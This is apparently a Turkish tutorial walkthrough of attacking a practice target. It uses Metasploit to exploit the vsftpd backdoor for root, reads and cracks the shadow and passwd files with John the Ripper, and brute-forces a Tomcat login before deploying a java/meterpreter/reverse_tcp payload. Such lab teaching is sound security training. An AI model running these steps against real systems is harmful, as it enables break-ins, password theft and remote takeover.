vsftpd Nedir ?
vstfpd Linux dahil Unix tabanlı işletim sistemleri için bir FTP sunucusudur.
Zafiyet aramalarımızda vsftpd arka kapısının açık olduğunu gördük . Şimdide nasıl sızma işlemini yaptığımıza bakalım.
Metasploit içerisinden search komutumuz ile arıyoruz ve çıkan exploitimizi kullanıyoruz

Şimdi info diyip veya show options diyerek gerekli ayarlamamızı yapmamız için gerekenleri göreceğiz. Burada sadece RHOSTS umuzu set komutuyla değiştirip run veya exploit ediyoruz


Exploit ettikten sonra shell kısmına atıyor bizi ve yetkimizin ne olduğuna root olup olmadığımıza bakıyoruz . Sisteme root hakkıyla giriş yapılmış . Burda bırakabilirsiniz.
Sızdığımız makinanın shadow kısmında şifremiz var olabileceğinden dolayı bakacağız
Shell command kısmına düştükten sonra shell komutu kullanarak shelle düşüyoruz ve ardından shadow komutumuzu yazıyoruz.

Shadow kısmı bittikten sonra passwd kısmınada bakacağız fakat bu kısımda kolay kolay şifrelerimizin burda olmayacağını belirtmek istiyorum çünkü şifremizi kayıtedeceğimiz bir yerin ismini şifre yapmayız.

Daha sonra shadow ve passwd kodlarını 2 farklı txt ye alıyoruz john ile şifreleri bulabilmek için.


Daha sonrasında Johntheripper ile şifrelerimizi ayarlayacağız
Apache Tomcat/Coyote
Hedefin 8180 portunda http çalışıp arkasında da tomcat çalıştırılıyordu.
Bizde tomcatden yararlanacağız.
Metasploit frameworkümüzü açtıktan sonra search tomcat login diyoruz ve exploitlerime bakıyoruz.


Evet modülde rhosts u bizden girmemizi istiyor. Bizim önceden yaptığımız işlem sadece rhost yazan kısımlara ip adresini girer. Burda ise birden fazla adres vermeye müsait olduğundan rhosts olarak tanımlanmış. Kendimiz girmemiz gerek. Ve saldırıyı yapacağı port adresini 8180 e ayrlıyoruz. (İsterseniz PASS_FILE USERPASS_FILE USER_FILE yerlerine kendi wordlistinizi koyabilirsiniz.)
Yeterince hızlı bir şifre denemesinden sonra şifremizi öğreniyoruz. Artık şifremizde elimizde olduğuna göre exploitimizi kullanma vakti gelmiş demektir. Önceden yaptığımız aramadan aldığım deploy exploitini deniyoruz ve info kısmından gerekli ayarlamalara bakıyoruz.
set httpusername tomcat
set httppassword tomcat
set rport 8180
set payload java/meterpreter/reverse_tcp
dedikten sonra exploit ediyoruz.
Bunları dememizin sebebi iste yukarda ismimizi, şifremizi ve portumuzu tomcat, 8180 olarak bulmamız idi.
Meterpreterimiz açık sisteme giriş yapıldı. Meterpreter komutları ile bilgi alma işlemlerini gerçekleştirebilirsiniz.
[…] vsftpd […]